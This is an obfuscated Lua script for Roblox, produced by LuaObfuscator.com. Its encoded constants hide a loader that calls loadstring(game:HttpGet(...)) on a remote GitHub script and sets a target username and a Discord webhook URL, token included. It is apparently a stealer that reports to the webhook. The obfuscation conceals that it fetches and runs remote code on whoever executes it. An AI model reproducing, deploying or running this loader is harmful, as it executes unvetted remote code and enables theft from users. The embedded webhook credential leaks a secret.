--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==3) then function v25()local v31=v24();local v32=v24();local v33=2 -1 ;local v34=(v21(v32,2 -1 ,20) * ((3 -1)^(82 -50))) + v31 ;local v35=v21(v32,640 -(555 + 64) ,962 -(857 + 74) );local v36=((v21(v32,600 -(367 + (368 -167)) )==((1278 -(87 + 263)) -(214 + (893 -(67 + 113))))) and  -(1 + 0)) or (1 + 0) ;if (v35==(877 -(282 + 595))) then if (v34==(1637 -(1523 + 114))) then return v36 * (0 + 0) ;else local v81=0 -0 ;while true do if (v81==((781 + 284) -(68 + 997))) then v35=1271 -(226 + 1044) ;v33=(0 -0) -0 ;break;end end end elseif (v35==(2164 -(32 + 63 + 22))) then return ((v34==0) and (v36 * ((1 + 0)/(0 + 0)))) or (v36 * NaN) ;end return v8(v36,v35-(1980 -(892 + 65)) ) * (v33 + (v34/((4 -2)^(95 -43)))) ;end v26=nil;function v26(v37)local v38=0;local v39;local v40;while true do if (v38==(0 -0)) then v39=nil;if  not v37 then local v98=952 -(802 + 150) ;while true do if (v98==(0 -0)) then v37=v24();if (v37==0) then return "";end break;end end end v38=1 -0 ;end if (v38==(3 + (0 -0))) then return v6(v40);end if (v38==(999 -(915 + 15 + 67))) then v40={};for v82=(3 -1) -1 , #v39 do v40[v82]=v2(v1(v3(v39,v82,v82)));end v38=2 + 1 ;end if (v38==(1 -0)) then v39=v3(v16,v19,(v19 + v37) -(1188 -(1069 + 118)) );v19=v19 + v37 ;v38=4 -2 ;end end end v27=v24;v18=4;end if (v18==1) then function v21(v41,v42,v43)if v43 then local v71=(0 -0) + 0 ;local v72;while true do if (v71==(791 -(368 + 23 + 400))) then v72=(v41/((6 -4)^(v42-(1487 -(998 + 488)))))%((20 -(10 + (28 -20)))^(((v43-1) -(v42-(1 + 0))) + ((862 -(814 + 45)) -2))) ;return v72-(v72%(773 -(201 + 571))) ;end end else local v73=442 -(416 + 26) ;local v74;while true do if (v73==(0 -0)) then v74=(2 + 0)^(v42-(3 -2)) ;return (((v41%(v74 + v74))>=v74) and (1 + 0)) or (0 -0) ;end end end end v22=nil;function v22()local v44=0 + 0 ;local v45;while true do if (v44==(1423 -(630 + (3754 -2961)))) then v45=v1(v16,v19,v19);v19=v19 + (886 -(261 + 624)) ;v44=1 -0 ;end if (v44==(3 -(1 + 1))) then return v45;end end end v23=nil;v18=2;end if (v18==2) then function v23()local v46=0 -0 ;local v47;local v48;while true do if (v46==((6856 -5108) -(760 + 987))) then return (v48 * (2169 -(1789 + 124))) + v47 ;end if (v46==((7 + 759) -(745 + 21))) then v47,v48=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (5 -3) ;v46=1;end end end v24=nil;function v24()local v49=0 + 0 ;local v50;local v51;local v52;local v53;while true do if (v49==(1056 -(87 + 968))) then return (v53 * (73852352 -(57076953 -(1703 + 114)))) + (v52 * (59459 + (6778 -(376 + 325)))) + (v51 * 256) + v50 ;end if (v49==(0 -0)) then v50,v51,v52,v53=v1(v16,v19,v19 + (1416 -(447 + 966)) );v19=v19 + 4 ;v49=(2 -0) -1 ;end end end v25=nil;v18=3;end if (v18==5) then v30=nil;function v30(v54,v55,v56)local v57=0;local v58;local v59;local v60;while true do if (v57==1) then v60=v54[3];return function(...)local v84=v58;local v85=v59;local v86=v60;local v87=v28;local v88=1;local v89= -1;local v90={};local v91={...};local v92=v12("#",...) -1 ;local v93={};local v94={};for v99=0,v92 do if (v99>=v86) then v90[v99-v86 ]=v91[v99 + 1 ];else v94[v99]=v91[v99 + 1 ];end end local v95=(v92-v86) + 1 ;local v96;local v97;while true do v96=v84[v88];v97=v96[1];if (v97<=5) then if (v97<=2) then if (v97<=0) then v94[v96[2]]();elseif (v97>1) then v94[v96[2]]=v96[3]~=0 ;else v94[v96[2]]=v56[v96[3]];end elseif (v97<=3) then local v111=0;while true do if (v111==0) then v56[v96[3]]=v94[v96[2]];v88=v88 + 1 ;v96=v84[v88];v94[v96[2]]=v96[3];v111=1;end if (v111==1) then v88=v88 + 1 ;v96=v84[v88];v56[v96[3]]=v94[v96[2]];v88=v88 + 1 ;v111=2;end if (v111==3) then v88=v96[3];break;end if (v111==2) then v96=v84[v88];v94[v96[2]]=v96[3];v88=v88 + 1 ;v96=v84[v88];v111=3;end end elseif (v97==4) then local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==1) then v89=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==0) then v120=v96[2];v121,v122=v87(v94[v120](v13(v94,v120 + 1 ,v96[3])));v119=1;end if (v119==2) then for v187=v120,v89 do local v188=0;while true do if (v188==0) then v123=v123 + 1 ;v94[v187]=v121[v123];break;end end end break;end end else v94[v96[2]]=v96[3];end elseif (v97<=8) then if (v97<=6) then v88=v96[3];elseif (v97==7) then local v126=v96[2];local v127=v94[v96[3]];v94[v126 + 1 ]=v127;v94[v126]=v127[v96[4]];elseif (v94[v96[2]]==v96[4]) then v88=v88 + 1 ;else v88=v96[3];end elseif (v97<=10) then if (v97==9) then local v131=0;local v132;local v133;local v134;local v135;local v136;while true do if (v131==5) then v88=v88 + 1 ;v96=v84[v88];v136=v96[2];v94[v136]=v94[v136](v13(v94,v136 + 1 ,v89));v88=v88 + 1 ;v96=v84[v88];v131=6;end if (v131==3) then v96=v84[v88];v94[v96[2]]=v96[3];v88=v88 + 1 ;v96=v84[v88];v94[v96[2]]=v96[3]~=0 ;v88=v88 + 1 ;v131=4;end if (v131==0) then v132=nil;v133,v134=nil;v135=nil;v136=nil;v56[v96[3]]=v94[v96[2]];v88=v88 + 1 ;v131=1;end if (v131==1) then v96=v84[v88];v94[v96[2]]=v56[v96[3]];v88=v88 + 1 ;v96=v84[v88];v94[v96[2]]=v56[v96[3]];v88=v88 + 1 ;v131=2;end if (v131==2) then v96=v84[v88];v136=v96[2];v135=v94[v96[3]];v94[v136 + 1 ]=v135;v94[v136]=v135[v96[4]];v88=v88 + 1 ;v131=3;end if (v131==6) then v94[v96[2]]();v88=v88 + 1 ;v96=v84[v88];v88=v96[3];break;end if (v131==4) then v96=v84[v88];v136=v96[2];v133,v134=v87(v94[v136](v13(v94,v136 + 1 ,v96[3])));v89=(v134 + v136) -1 ;v132=0;for v189=v136,v89 do local v190=0;while true do if (v190==0) then v132=v132 + 1 ;v94[v189]=v133[v132];break;end end end v131=5;end end else do return;end end elseif (v97>11) then v56[v96[3]]=v94[v96[2]];else local v139=v96[2];v94[v139]=v94[v139](v13(v94,v139 + 1 ,v89));end v88=v88 + 1 ;end end;end if (0==v57) then v58=v54[1];v59=v54[2];v57=1;end end end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v75=0;while true do if (0==v75) then v20=v0(v3(v61,1,1));return "";end end else local v76=0;local v77;while true do if (0==v76) then v77=v2(v0(v61,16));if v20 then local v109=v5(v77,v20);v20=nil;return v109;else return v77;end break;end end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v62=0;local v63;local v64;local v65;local v66;local v67;local v68;local v69;local v70;while true do if (3~=v62) then else v69=nil;v70=nil;v62=2 + 2 ;end if (v62~=(14 -10)) then else while true do if (v63==(5 -3)) then local v102=29 -(22 + 7) ;while true do if (v102==1) then v63=2 + 1 ;break;end if ((0 + 0)==v102) then v68=nil;v69=nil;v102=1 + 0 ;end end end if ((4 -3)~=v63) then else local v103=0;while true do if (v103==(754 -(239 + 514))) then v63=2;break;end if (v103==(1985 -(1266 + 719))) then v66=nil;v67=nil;v103=1;end end end if (v63==(2 + 1)) then v70=nil;while true do local v110=603 -(268 + 335) ;while true do if (v110==(291 -(60 + 230))) then if (v64~=(1 + 0)) then else v69=v24();v70={};for v141=573 -(426 + 146) ,v69 do local v142=0;local v143;local v144;local v145;while true do if (v142==1) then v145=nil;while true do if (v143~=(0 + 0)) then else local v192=1456 -(282 + 1174) ;local v193;while true do if (v192~=(0 -0)) then else v193=1202 -(373 + 829) ;while true do if (v193==(812 -(569 + 242))) then v143=1;break;end if (v193~=(0 -0)) then else local v206=731 -(476 + 255) ;while true do if (v206==1) then v193=1 + 0 ;break;end if (v206==(0 + 0)) then local v216=0;while true do if (v216==(1024 -(706 + 318))) then v144=v22();v145=nil;v216=1252 -(721 + 530) ;end if (v216~=(1272 -(945 + 326))) then else v206=1;break;end end end end end end break;end end end if (v143~=1) then else if (v144==(1 -0)) then v145=v22()~=(238 -(64 + 174)) ;elseif (v144==(4 -2)) then v145=v25();elseif (v144==3) then v145=v26();end v70[v141]=v145;break;end end break;end if ((0 + 0)==v142) then local v186=0 + 0 ;while true do if (v186==(1 -0)) then v142=1;break;end if (v186~=(700 -(271 + 429))) then else v143=0 + 0 ;v144=nil;v186=1501 -(1408 + 92) ;end end end end end v68[3]=v22();v64=2;end break;end if (v110~=0) then else if (v64~=(1086 -(461 + 625))) then else local v114=1288 -(993 + 295) ;local v115;while true do if (v114==(0 + 0)) then v115=1171 -(418 + 753) ;while true do if (0~=v115) then else v65={};v66={};v115=1;end if (v115~=(1 + 1)) then else v64=1505 -(363 + 1141) ;break;end if ((1581 -(1183 + 397))~=v115) then else local v191=0;while true do if (v191==1) then v115=1 + 1 ;break;end if ((0 + 0)==v191) then v67={};v68={v65,v66,nil,v67};v191=1976 -(1913 + 62) ;end end end end break;end end end if (v64~=(1 + 1)) then else for v146=530 -(406 + 123) ,v24() do local v147=1769 -(1749 + 20) ;local v148;local v149;while true do if (v147==(0 + 0)) then v148=1322 -(1249 + 73) ;v149=nil;v147=1;end if (v147==(1 + 0)) then while true do if (v148==0) then v149=v22();if (v21(v149,1,1146 -(466 + 679) )~=(0 -0)) then else local v199=0 -0 ;local v200;local v201;local v202;local v203;while true do if ((0 + 0)==v199) then v200=856 -(564 + 292) ;v201=nil;v199=1 -0 ;end if (v199~=(2 -1)) then else local v204=0 -0 ;local v205;while true do if (v204==(0 + 0)) then v205=1900 -(106 + 1794) ;while true do if (v205==(0 + 0)) then v202=nil;v203=nil;v205=1 + 0 ;end if (v205==(1 + 0)) then v199=2;break;end end break;end end end if (v199~=(5 -3)) then else while true do if (v200==(7 -4)) then if (v21(v202,3,1128 -(936 + 189) )==(1 + 0)) then v203[4]=v70[v203[4]];end v65[v146]=v203;break;end if (1~=v200) then else local v208=114 -(4 + 110) ;local v209;while true do if (0==v208) then v209=0;while true do if ((584 -(57 + 527))~=v209) then else local v219=0 + 0 ;while true do if (v219~=(1428 -(41 + 1386))) then else v209=1;break;end if (v219==(103 -(17 + 86))) then v203={v23(),v23(),nil,nil};if (v201==(0 -0)) then local v221=166 -(122 + 44) ;local v222;while true do if (v221==(0 -0)) then v222=0 -0 ;while true do if (v222==0) then v203[1095 -(975 + 117) ]=v23();v203[4 + 0 ]=v23();break;end end break;end end elseif (v201==(1 + 0)) then v203[1878 -(157 + 1718) ]=v24();elseif (v201==(3 -1)) then v203[68 -(30 + 35) ]=v24() -((2 + 0)^16) ;elseif (v201~=(1021 -(697 + 321))) then else local v231=1257 -(1043 + 214) ;local v232;local v233;while true do if (v231==0) then v232=0;v233=nil;v231=1;end if (v231~=(3 -2)) then else while true do if ((1212 -(323 + 889))~=v232) then else v233=0;while true do if (v233==(0 -0)) then v203[7 -4 ]=v24() -((582 -(361 + 219))^(336 -(53 + 267))) ;v203[6 -2 ]=v23();break;end end break;end end break;end end end v219=2 -1 ;end end end if ((1 + 0)==v209) then v200=415 -(15 + 398) ;break;end end break;end end end if (v200==0) then local v210=982 -(18 + 964) ;local v211;local v212;while true do if (v210==(3 -2)) then while true do if (v211==(0 + 0)) then v212=1189 -(449 + 740) ;while true do if (v212==1) then v200=873 -(826 + 46) ;break;end if (v212==0) then local v220=0 + 0 ;while true do if ((851 -(20 + 830))==v220) then v212=3 -2 ;break;end if (v220~=(0 + 0)) then else v201=v21(v149,128 -(116 + 10) ,1 + 2 );v202=v21(v149,1 + 3 ,744 -(542 + 196) );v220=441 -(382 + 58) ;end end end end break;end end break;end if (v210~=(0 -0)) then else v211=0 -0 ;v212=nil;v210=1 + 0 ;end end end if (v200==(2 + 0)) then local v213=0;local v214;local v215;while true do if (v213==(1 + 0)) then while true do if (v214~=0) then else v215=0 -0 ;while true do if (v215==(2 -1)) then v200=3;break;end if (v215==(0 -0)) then if (v21(v202,1552 -(1126 + 425) ,1)~=(406 -(118 + 287))) then else v203[2]=v70[v203[7 -5 ]];end if (v21(v202,1123 -(118 + 1003) ,5 -3 )~=(378 -(142 + 235))) then else v203[13 -10 ]=v70[v203[3]];end v215=1 -0 ;end end break;end end break;end if (v213==(0 -0)) then v214=0 + 0 ;v215=nil;v213=1691 -(1121 + 569) ;end end end end break;end end end break;end end break;end end end for v150=1,v24() do v66[v150-(1 + 0) ]=v29();end return v68;end v110=1;end end end break;end if (v63==(214 -(22 + 192))) then local v104=977 -(553 + 424) ;while true do if ((1 -0)==v104) then v63=684 -(483 + 200) ;break;end if (0==v104) then v64=0 + 0 ;v65=nil;v104=1 + 0 ;end end end end break;end if (v62==(1463 -(1404 + 59))) then v63=0 + 0 ;v64=nil;v62=1 + 0 ;end if (v62==1) then v65=nil;v66=nil;v62=2 + 0 ;end if (2~=v62) then else v67=nil;v68=nil;v62=6 -3 ;end end end v18=5;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203063O0053787261716E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303738352O38302O382O32373436373332372F3067584759506268547342756131376134335951564F6F537856776C556C7879634553487A725F56374B72736437486A344546732D592D62434F352O5875387A6276756900173O0012053O00013O0026083O000E000100020004063O000E0001001205000100043O001209000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026083O0001000100010004063O00010001001205000100043O001203000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O000A3O00017O00",v9(),...);
